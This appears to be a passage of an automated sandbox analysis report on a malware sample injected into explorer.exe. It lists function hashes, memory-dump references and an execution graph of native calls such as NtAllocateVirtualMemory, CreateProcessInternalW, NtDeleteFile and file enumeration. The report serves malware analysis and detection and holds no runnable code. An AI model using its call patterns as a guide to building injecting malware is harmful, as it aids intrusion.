                  • Instruction ID: 11599cd2a60e66fb70af32a04b561cbc5d58a1c7c01736f5a82992e6b5f43e2c
                  • Opcode Fuzzy Hash: 99dbe433e699e59aea7a5b624db7a438143649fabd60635e0e258ac5d2723d6a
                  • Instruction Fuzzy Hash: 9C417BF5911118BEEB01EBE0CC42FEF7B7C9FD5608F104159FA08AA180E7B56A0587E6
                  Function 049393F9 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                  • API String ID: 0-2877786613
                  • Opcode ID: 9ed8e09ea4cfcea39ca52e4772a29887979a6c0260aee08e5b9b3fe8ed506fac
                  • Instruction ID: c39d777b04590ea0d472db4dc9bbc6b9e3434238dad6a71c74c3a95265ae7da6
                  • Opcode Fuzzy Hash: 9ed8e09ea4cfcea39ca52e4772a29887979a6c0260aee08e5b9b3fe8ed506fac
                  • Instruction Fuzzy Hash: 5D313BF5511118BAEB01EBE0CC42FEF777C9FD5609F104059FA086A180E6B56A0587E6
                  Function 04935A09 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Offset: 04640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_4640000_AbWHWpocGREf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2$7$F$S
                  • API String ID: 0-1969315904
                  • Opcode ID: a33f054312728a104629af5554b48ecdfbfe3a7703a61088590b608583de2ebd
                  • Instruction ID: e995f3780639715a67fc0ab93278fd7f3193a0e11358871fd09ecb1d11fa5722
                  • Opcode Fuzzy Hash: a33f054312728a104629af5554b48ecdfbfe3a7703a61088590b608583de2ebd
                  • Instruction Fuzzy Hash: FD3148B1911109BBEB14DBE4DD41FEF77B8EF89318F004199F908A7240E7B5AA048BE5

                  Execution Graph

                  Execution Coverage:2.5%
                  Dynamic/Decrypted Code Coverage:4.3%
                  Signature Coverage:1.6%
                  Total number of Nodes:445
                  Total number of Limit Nodes:70
                  execution_graph 97916 2f17df0 97917 2f17e15 97916->97917 97918 2f17e99 97916->97918 97919 2f17eaf NtCreateFile 97918->97919 97920 2f074f4 97921 2f074fc 97920->97921 97924 2f0a800 97921->97924 97929 2f0a530 97924->97929 97926 2f0a80d 97943 2f0a1e0 97926->97943 97928 2f07501 97930 2f0a555 97929->97930 97954 2f07ee0 97930->97954 97933 2f0a692 97933->97926 97935 2f0a6a9 97935->97926 97936 2f0a6a0 97936->97935 97938 2f0a791 97936->97938 97969 2f09c40 97936->97969 97940 2f0a7e9 97938->97940 97978 2f09fa0 97938->97978 97982 2f19fc0 97940->97982 97944 2f0a1f3 97943->97944 97947 2f0a1fe 97943->97947 97945 2f1a0a0 RtlAllocateHeap 97944->97945 97945->97947 97946 2f0a211 97946->97928 97947->97946 97948 2f07ee0 GetFileAttributesW 97947->97948 97949 2f0a502 97947->97949 97952 2f09c40 RtlFreeHeap 97947->97952 97953 2f09fa0 RtlFreeHeap 97947->97953 97948->97947 97950 2f0a518 97949->97950 97951 2f19fc0 RtlFreeHeap 97949->97951 97950->97928 97951->97950 97952->97947 97953->97947 97955 2f07f01 97954->97955 97956 2f07f08 GetFileAttributesW 97955->97956 97957 2f07f13 97955->97957 97956->97957 97957->97933 97958 2f12520 97957->97958 97959 2f1252e 97958->97959 97960 2f12535 97958->97960 97959->97936 97985 2f04600 97960->97985 97963 2f12579 97968 2f12714 97963->97968 97989 2f1a0a0 97963->97989 97966 2f19fc0 RtlFreeHeap 97966->97968 97967 2f12592 97967->97966 97967->97968 97968->97936 97970 2f09c66 97969->97970 97996 2f0d450 97970->97996 97972 2f09ccd 97974 2f09e50 97972->97974 97975 2f09ceb 97972->97975 97973 2f09e35 97973->97936 97974->97973 97976 2f09b00 RtlFreeHeap 97974->97976 97975->97973 98001 2f09b00 97975->98001 97976->97974 97979 2f09fc6 97978->97979 97980 2f0d450 RtlFreeHeap 97979->97980 97981 2f0a042 97980->97981 97981->97938 98009 2f18450 97982->98009 97984 2f0a7f0 97984->97926 97986 2f04624 97985->97986 97987 2f04660 LdrLoadDll 97986->97987 97988 2f0462b 97986->97988 97987->97988 97988->97963 97992 2f11ff0 LdrLoadDll 97988->97992 97993 2f18400 97989->97993 97991 2f1a0bb 97991->97967 97992->97963 97994 2f1841d 97993->97994 97995 2f1842e RtlAllocateHeap 97994->97995 97995->97991 97997 2f0d466 97996->97997 97998 2f0d473 97997->97998 97999 2f19fc0 RtlFreeHeap 97997->97999 97998->97972 98000 2f0d4ac 97999->98000 98000->97972 98002 2f09b16 98001->98002 98005 2f0d4c0 98002->98005 98004 2f09c1c 98004->97975 98006 2f0d4e4 98005->98006 98007 2f0d57c 98006->98007 98008 2f19fc0 RtlFreeHeap 98006->98008 98007->98004 98008->98007 98010 2f1846a 98009->98010 98011 2f1847b RtlFreeHeap 98010->98011 98011->97984 98012 2f09734 98013 2f09744 98012->98013 98014 2f0974b 98013->98014 98015 2f19fc0 RtlFreeHeap 98013->98015 98015->98014 98016 2f0323c 98021 2f07910 98016->98021 98018 2f03261 98022 2f0792a 98021->98022 98026 2f0324c 98021->98026 98030 2f17800 98022->98030 98025 2f180e0 NtClose 98025->98026 98026->98018 98027 2f180e0 98026->98027 98028 2f180fd 98027->98028 98029 2f1810e NtClose 98028->98029 98029->98018 98031 2f1781a 98030->98031 98034 50135c0 LdrInitializeThunk 98031->98034 98032 2f079fa 98032->98025 98034->98032 98035 2f058a0 98040 2f07c90 98035->98040 98037 2f058d0 98039 2f058fc 98037->98039 98044 2f07c10 98037->98044 98041 2f07ca3 98040->98041 98051 2f17660 98041->98051 98043 2f07cce 98043->98037 98045 2f07c54 98044->98045 98046 2f07c75 98045->98046 98057 2f17460 98045->98057 98046->98037 98048 2f07c65 98049 2f07c81 98048->98049 98050 2f180e0 NtClose 98048->98050 98049->98037 98050->98046 98052 2f17688 98051->98052 98053 2f176d6 98051->98053 98052->98043 98056 5012dd0 LdrInitializeThunk 98053->98056 98054 2f176fb 98054->98043 98056->98054 98058 2f174d2 98057->98058 98060 2f17484 98057->98060 98062 5014650 LdrInitializeThunk 98058->98062 98059 2f174f7 98059->98048 98060->98048 98062->98059 98063 2f0f020 98064 2f0f084 98063->98064 98092 2f06110 98064->98092 98066 2f0f1b4 98067 2f0f1ad 98067->98066 98099 2f06220 98067->98099 98069 2f0f353 98070 2f0f230 98070->98069 98071 2f0f362 98070->98071 98103 2f0ee00 98070->98103 98072 2f180e0 NtClose 98071->98072 98074 2f0f36c 98072->98074 98075 2f0f265 98075->98071 98076 2f0f270 98075->98076 98077 2f1a0a0 RtlAllocateHeap 98076->98077 98078 2f0f299 98077->98078 98079 2f0f2a2 98078->98079 98080 2f0f2b8 98078->98080 98081 2f180e0 NtClose 98079->98081 98112 2f0ecf0 CoInitialize 98080->98112 98083 2f0f2ac 98081->98083 98084 2f0f2c6 98114 2f17bc0 98084->98114 98086 2f0f342 98087 2f180e0 NtClose 98086->98087 98088 2f0f34c 98087->98088 98089 2f19fc0 RtlFreeHeap 98088->98089 98089->98069 98090 2f0f2e4 98090->98086 98091 2f17bc0 LdrInitializeThunk 98090->98091 98091->98090 98093 2f06143 98092->98093 98094 2f06164 98093->98094 98118 2f17c60 98093->98118 98094->98067 98096 2f06187 98096->98094 98097 2f180e0 NtClose 98096->98097 98098 2f06207 98097->98098 98098->98067 98100 2f06245 98099->98100 98123 2f17a50 98100->98123 98104 2f0ee1c 98103->98104 98105 2f04600 LdrLoadDll 98104->98105 98107 2f0ee3a 98105->98107 98106 2f0ee43 98106->98075 98107->98106 98108 2f04600 LdrLoadDll 98107->98108 98109 2f0ef0e 98108->98109 98110 2f04600 LdrLoadDll 98109->98110 98111 2f0ef6b 98109->98111 98110->98111 98111->98075 98113 2f0ed55 98112->98113 98113->98084 98115 2f17bda 98114->98115 98128 5012ba0 LdrInitializeThunk 98115->98128 98116 2f17c0a 98116->98090 98119 2f17c7a 98118->98119 98122 5012ca0 LdrInitializeThunk 98119->98122 98120 2f17ca6 98120->98096 98122->98120 98124 2f17a6a 98123->98124 98127 5012c60 LdrInitializeThunk 98124->98127 98125 2f062b9 98125->98070 98127->98125 98128->98116 98129 2f175a0 98130 2f17624 98129->98130 98132 2f175c4 98129->98132 98134 5012ee0 LdrInitializeThunk 98130->98134 98131 2f17655 98134->98131 98135 5012ad0 LdrInitializeThunk 98136 2f00d2b PostThreadMessageW 98137 2f00d3d 98136->98137 98138 2f0836e 98139 2f08373 98138->98139 98140 2f08332 98139->98140 98142 2f06de0 LdrInitializeThunk LdrInitializeThunk 98139->98142 98142->98140 98143 2ef9770 98146 2ef9b43 98143->98146 98144 2ef9ffb 98146->98144 98147 2f19c60 98146->98147 98148 2f19c86 98147->98148 98153 2ef4060 98148->98153 98150 2f19c92 98151 2f19cc0 98150->98151 98156 2f14700 98150->98156 98151->98144 98160 2f03340 98153->98160 98155 2ef406d 98155->98150 98157 2f1475a 98156->98157 98158 2f14767 98157->98158 98181 2f01800 98157->98181 98158->98151 98161 2f03354 98160->98161 98163 2f03381 98161->98163 98165 2f0336d 98161->98165 98173 2f17040 RtlFreeHeap LdrInitializeThunk 98161->98173 98166 2f18b30 98163->98166 98165->98155 98168 2f18b48 98166->98168 98167 2f18b6c 98167->98165 98168->98167 98174 2f17760 98168->98174 98171 2f19fc0 RtlFreeHeap 98172 2f18bd4 98171->98172 98172->98165 98173->98163 98175 2f1777a 98174->98175 98178 5012c0a 98175->98178 98176 2f177a6 98176->98171 98179 5012c11 98178->98179 98180 5012c1f LdrInitializeThunk 98178->98180 98179->98176 98180->98176 98182 2f0183b 98181->98182 98197 2f07a20 98182->98197 98184 2f01843 98185 2f1a0a0 RtlAllocateHeap 98184->98185 98196 2f01b02 98184->98196 98186 2f01859 98185->98186 98187 2f1a0a0 RtlAllocateHeap 98186->98187 98188 2f0186a 98187->98188 98189 2f1a0a0 RtlAllocateHeap 98188->98189 98191 2f0187b 98189->98191 98192 2f01903 98191->98192 98212 2f06870 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98191->98212 98193 2f04600 LdrLoadDll 98192->98193 98194 2f01ac2 98193->98194 98208 2f16e20 98194->98208 98196->98158 98198 2f07a4c 98197->98198 98199 2f07910 2 API calls 98198->98199 98200 2f07a6f 98199->98200 98201 2f07a91 98200->98201 98202 2f07a79 98200->98202 98204 2f07aad 98201->98204 98206 2f180e0 NtClose 98201->98206 98203 2f07a84 98202->98203 98205 2f180e0 NtClose 98202->98205 98203->98184 98204->98184 98205->98203 98207 2f07aa3 98206->98207 98207->98184 98209 2f16e7a 98208->98209 98211 2f16e87 98209->98211 98213 2f01b20 98209->98213 98211->98196 98212->98192 98232 2f07cf0 98213->98232 98215 2f01b40 98222 2f02028 98215->98222 98236 2f10890 98215->98236 98218 2f01d41 98244 2f1b1d0 98218->98244 98220 2f01b9e 98220->98222 98239 2f1b0a0 98220->98239 98221 2f07c90 LdrInitializeThunk 98227 2f01d81 98221->98227 98222->98211 98224 2f01d56 98225 2f01ea5 98224->98225 98224->98227 98250 2f14780 98224->98250 98254 2f007c0 98225->98254 98227->98221 98227->98222 98228 2f14780 2 API calls 98227->98228 98229 2f007c0 LdrInitializeThunk 98227->98229 98228->98227 98229->98227 98230 2f01eaf 98230->98227 98231 2f07c90 LdrInitializeThunk 98230->98231 98231->98230 98233 2f07cfd 98232->98233 98234 2f07d25 98233->98234 98235 2f07d1e SetErrorMode 98233->98235 98234->98215 98235->98234 98258 2f19f40 98236->98258 98238 2f108b1 98238->98220 98240 2f1b0b0 98239->98240 98241 2f1b0b6 98239->98241 98240->98218 98242 2f1a0a0 RtlAllocateHeap 98241->98242 98243 2f1b0dc 98242->98243 98243->98218 98245 2f1b140 98244->98245 98246 2f1a0a0 RtlAllocateHeap 98245->98246 98247 2f1b19d 98245->98247 98248 2f1b17a 98246->98248 98247->98224 98249 2f19fc0 RtlFreeHeap 98248->98249 98249->98247 98251 2f147da 98250->98251 98253 2f147fb 98251->98253 98265 2f05990 98251->98265 98253->98224 98255 2f007d9 98254->98255 98277 2f18360 98255->98277 98261 2f18240 98258->98261 98260 2f19f6e 98260->98238 98262 2f182c7 98261->98262 98264 2f18261 98261->98264 98263 2f182dd NtAllocateVirtualMemory 98262->98263 98263->98260 98264->98260 98266 2f0594f 98265->98266 98266->98265 98267 2f17760 LdrInitializeThunk 98266->98267 98270 2f0597b 98266->98270 98268 2f05966 98267->98268 98271 2f18180 98268->98271 98270->98253 98272 2f18201 98271->98272 98274 2f181a1 98271->98274 98276 5012e80 LdrInitializeThunk 98272->98276 98273 2f18232 98273->98270 98274->98270 98276->98273 98278 2f1837d 98277->98278 98281 5012c70 LdrInitializeThunk 98278->98281 98279 2f007df 98279->98230 98281->98279 98282 2f0f8d0 98283 2f0f8ed 98282->98283 98284 2f04600 LdrLoadDll 98283->98284 98285 2f0f90b 98284->98285 98286 2f0bf90 98288 2f0bfb9 98286->98288 98287 2f0c0bd 98288->98287 98289 2f0c063 FindFirstFileW 98288->98289 98289->98287 98291 2f0c07e 98289->98291 98290 2f0c0a4 FindNextFileW 98290->98291 98292 2f0c0b6 FindClose 98290->98292 98291->98290 98292->98287 98293 2f07150 98294 2f07168 98293->98294 98296 2f071c2 98293->98296 98294->98296 98297 2f0acf0 98294->98297 98298 2f0ad16 98297->98298 98299 2f0af35 98298->98299 98324 2f184e0 98298->98324 98299->98296 98301 2f0ad8c 98301->98299 98302 2f1b1d0 2 API calls 98301->98302 98303 2f0ada8 98302->98303 98303->98299 98304 2f0ae79 98303->98304 98305 2f17760 LdrInitializeThunk 98303->98305 98306 2f05820 LdrInitializeThunk 98304->98306 98308 2f0ae98 98304->98308 98307 2f0ae04 98305->98307 98306->98308 98307->98304 98311 2f0ae0d 98307->98311 98312 2f0af1d 98308->98312 98331 2f17320 98308->98331 98309 2f0ae61 98313 2f07c90 LdrInitializeThunk 98309->98313 98310 2f0ae3f 98346 2f13900 LdrInitializeThunk 98310->98346 98311->98299 98311->98309 98311->98310 98327 2f05820 98311->98327 98315 2f07c90 LdrInitializeThunk 98312->98315 98314 2f0ae6f 98313->98314 98314->98296 98319 2f0af2b 98315->98319 98319->98296 98320 2f0aef4 98336 2f173c0 98320->98336 98322 2f0af0e 98341 2f17500 98322->98341 98325 2f184fd 98324->98325 98326 2f1850e CreateProcessInternalW 98325->98326 98326->98301 98328 2f0582b 98327->98328 98347 2f17920 98328->98347 98330 2f0585e 98330->98310 98332 2f1738f 98331->98332 98333 2f17341 98331->98333 98353 50139b0 LdrInitializeThunk 98332->98353 98333->98320 98334 2f173b4 98334->98320 98337 2f17432 98336->98337 98339 2f173e4 98336->98339 98354 5014340 LdrInitializeThunk 98337->98354 98338 2f17457 98338->98322 98339->98322 98342 2f17572 98341->98342 98344 2f17524 98341->98344 98355 5012fb0 LdrInitializeThunk 98342->98355 98343 2f17597 98343->98312 98344->98312 98346->98309 98348 2f179c2 98347->98348 98350 2f17944 98347->98350 98352 5012d10 LdrInitializeThunk 98348->98352 98349 2f17a07 98349->98330 98350->98330 98352->98349 98353->98334 98354->98338 98355->98343 98362 2f11250 98366 2f1125f 98362->98366 98363 2f112a6 98364 2f19fc0 RtlFreeHeap 98363->98364 98365 2f112b6 98364->98365 98366->98363 98367 2f112e4 98366->98367 98369 2f112e9 98366->98369 98368 2f19fc0 RtlFreeHeap 98367->98368 98368->98369 98376 2f17710 98377 2f1772a 98376->98377 98380 5012df0 LdrInitializeThunk 98377->98380 98378 2f17752 98380->98378 98381 2f10a14 98382 2f10a6b 98381->98382 98384 2f10a1f 98381->98384 98394 2f17f50 98382->98394 98385 2f10a72 98386 2f10a90 98385->98386 98387 2f10aa5 98385->98387 98389 2f180e0 NtClose 98386->98389 98388 2f180e0 NtClose 98387->98388 98391 2f10aae 98388->98391 98389->98384 98390 2f10ada 98391->98390 98392 2f19fc0 RtlFreeHeap 98391->98392 98393 2f10ace 98392->98393 98395 2f17fec 98394->98395 98397 2f17f74 98394->98397 98396 2f18002 NtReadFile 98395->98396 98396->98385 98397->98385 98398 2f06bc0 98399 2f06bea 98398->98399 98402 2f07ac0 98399->98402 98401 2f06c11 98403 2f07add 98402->98403 98409 2f17850 98403->98409 98405 2f07b2d 98406 2f07b34 98405->98406 98407 2f17920 LdrInitializeThunk 98405->98407 98406->98401 98408 2f07b5d 98407->98408 98408->98401 98410 2f178e0 98409->98410 98412 2f17874 98409->98412 98414 5012f30 LdrInitializeThunk 98410->98414 98411 2f17919 98411->98405 98412->98405 98414->98411 98415 2f150c0 98416 2f1511a 98415->98416 98418 2f15127 98416->98418 98419 2f12c40 98416->98419 98420 2f19f40 NtAllocateVirtualMemory 98419->98420 98422 2f12c81 98420->98422 98421 2f12d86 98421->98418 98422->98421 98423 2f04600 LdrLoadDll 98422->98423 98425 2f12cc7 98423->98425 98424 2f12d00 Sleep 98424->98425 98425->98421 98425->98424 98426 2f10ec0 98427 2f10edc 98426->98427 98428 2f10f04 98427->98428 98429 2f10f18 98427->98429 98430 2f180e0 NtClose 98428->98430 98431 2f180e0 NtClose 98429->98431 98432 2f10f0d 98430->98432 98433 2f10f21 98431->98433 98436 2f1a0e0 RtlAllocateHeap 98433->98436 98435 2f10f2c 98436->98435 98437 2f18040 98438 2f180ac 98437->98438 98440 2f18064 98437->98440 98439 2f180c2 NtDeleteFile 98438->98439 98442 2f1b100 98443 2f19fc0 RtlFreeHeap 98442->98443 98444 2f1b115 98443->98444 98445 2f028c8 98446 2f028e8 98445->98446 98447 2f06110 2 API calls 98446->98447 98448 2f028f3 98447->98448 98449 2f07148 98450 2f070eb 98449->98450 98455 2f0714f 98449->98455 98451 2f07122 98450->98451 98458 2f063a0 NtClose LdrInitializeThunk LdrInitializeThunk 98450->98458 98452 2f071c2 98454 2f070fc 98454->98451 98459 2f06570 NtClose LdrInitializeThunk LdrInitializeThunk 98454->98459 98455->98452 98457 2f0acf0 9 API calls 98455->98457 98457->98452 98458->98454 98459->98451 98460 2efb610 98461 2efb674 98460->98461 98462 2f19f40 NtAllocateVirtualMemory 98461->98462 98463 2efcc81 98462->98463 98464 2ef9710 98465 2ef971f 98464->98465 98466 2ef9760 98465->98466 98467 2ef974d CreateThread 98465->98467

                  Executed Functions

                  Function 02F0BF90 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F0C074
                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02F0C0AF
                  • FindClose.KERNELBASE(?), ref: 02F0C0BA
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNext
                  • String ID:
                  • API String ID: 3541575487-0
                  • Opcode ID: 978cd24865c12f60bbca113ce78a1ac68953a6b32af5c04fc5577fb7371a4f8e
                  • Instruction ID: 0fbe6e7f4a9947d6646bb7d1ea64dc415a47f52ee3769eb3500ddf3dc35597a1
                  • Opcode Fuzzy Hash: 978cd24865c12f60bbca113ce78a1ac68953a6b32af5c04fc5577fb7371a4f8e
                  • Instruction Fuzzy Hash: BF316571900348BBEB20DF64CC85FEFB77D9F84B44F144559B709A6181DB70AA84CBA1
                  Function 02F17DF0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F17EE0
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 94d6dc0472137d74c491f64fe8fd382900dab0c1c8241d7e12d0078d41ad40e2
                  • Instruction ID: 70070239adb2ba08f7fa54dbd314f6f6188cfc12dcd8eb878b1f42a3162a2185
                  • Opcode Fuzzy Hash: 94d6dc0472137d74c491f64fe8fd382900dab0c1c8241d7e12d0078d41ad40e2
                  • Instruction Fuzzy Hash: 9031C2B5A00609AFCB14DF98DC81EDEB7F9AF8C714F108219FA19A7240D770A951CFA4
                  Function 02F17F50 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F1802B
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 9658e476ee4fad422d025bc40ebeec1edb52022e45c9a7607ab404fed910bd1b
                  • Instruction ID: e78bd6aa09cc297604d4382dbbabf1f2c945a95872b414c8fc51a41b537c6b7e
                  • Opcode Fuzzy Hash: 9658e476ee4fad422d025bc40ebeec1edb52022e45c9a7607ab404fed910bd1b
                  • Instruction Fuzzy Hash: 2431CAB5A00208AFDB14DF99DC51EEF77B9EF88714F108219F919A7244D770A811CFA5
                  Function 02F18240 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(02F01B9E,?,02F16E87,00000000,00000004,00003000,?,?,?,?,?,02F16E87,02F01B9E,02F19F6E,02F16E87,52F0558D), ref: 02F182FA
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 57453188d93fe0e74a81e5aa298d52f2514bfdb4fb1a151c6703d3219c34f312
                  • Instruction ID: 6b12d27452caaa9e944c3540de53cc4d8c9991054e9d3f960b05410640560423
                  • Opcode Fuzzy Hash: 57453188d93fe0e74a81e5aa298d52f2514bfdb4fb1a151c6703d3219c34f312
                  • Instruction Fuzzy Hash: 71213CB5A00608AFDB14DF98CC51FAFB7B9EF88704F008519FE09A7240D774A811CBA1
                  Function 02F18040 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: 53ceab4f47220ec794463685b33308a1fda98192d395e01c79f9dffc0ed48b54
                  • Instruction ID: 866957569f17087129798a030aa4ebe00c3e7eba5d78e8ccaa4b9aa722765fd5
                  • Opcode Fuzzy Hash: 53ceab4f47220ec794463685b33308a1fda98192d395e01c79f9dffc0ed48b54
                  • Instruction Fuzzy Hash: 220184716412087FE620EAA8CC41FAB736DEB85754F404609FB09AB180D7B17910CBE5
                  Function 02F180E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F18117
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction ID: 42753ab54ca318020642be4be2106d01b4582a7d6a6505fcda58049a4cbafb28
                  • Opcode Fuzzy Hash: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction Fuzzy Hash: 2AE046362406087BE620EA69DC00F9B77ADEBC9758F508519FA08AB241CA71B9058BE0
                  Function 05014650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: f3a1044409e1c979311a8daa904e034c0f6268150e72a059d0a6cfb3df6e6ce3
                  • Instruction ID: 2e905062992ac01b088a7bf84ea5c9ef8e45bd94f85a7eda2d3026aa8a79a24d
                  • Opcode Fuzzy Hash: f3a1044409e1c979311a8daa904e034c0f6268150e72a059d0a6cfb3df6e6ce3
                  • Instruction Fuzzy Hash: EC9002666016104251407158984540A60159BE13013D5C116A0554560C8A1889559269
                  Function 05014340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 30a192af3670ed123c4d39cc1646db8c269271e26e96b5fe31a452c532608451
                  • Instruction ID: 34549410ceff239aae992450ff3cbef7ba6fa35a323b4caefc494e668b17da75
                  • Opcode Fuzzy Hash: 30a192af3670ed123c4d39cc1646db8c269271e26e96b5fe31a452c532608451
                  • Instruction Fuzzy Hash: 7D90023660591012A140715898C554A40159BE0301B95C012E0424554C8E148A565361
                  Function 05012D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 0e31ab62774b2faab1bf5a7df7143caf8e4fbd80dcb76733b17ddaa059fb1ee5
                  • Instruction ID: 90313492260e1a5c902c5e9603005ba52fd5cda4b104bba49217ddcda4d69162
                  • Opcode Fuzzy Hash: 0e31ab62774b2faab1bf5a7df7143caf8e4fbd80dcb76733b17ddaa059fb1ee5
                  • Instruction Fuzzy Hash: 9290022E21351002E1807158A44960E00158BD1202FD5D416A0015558CCD1589695321
                  Function 05012D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
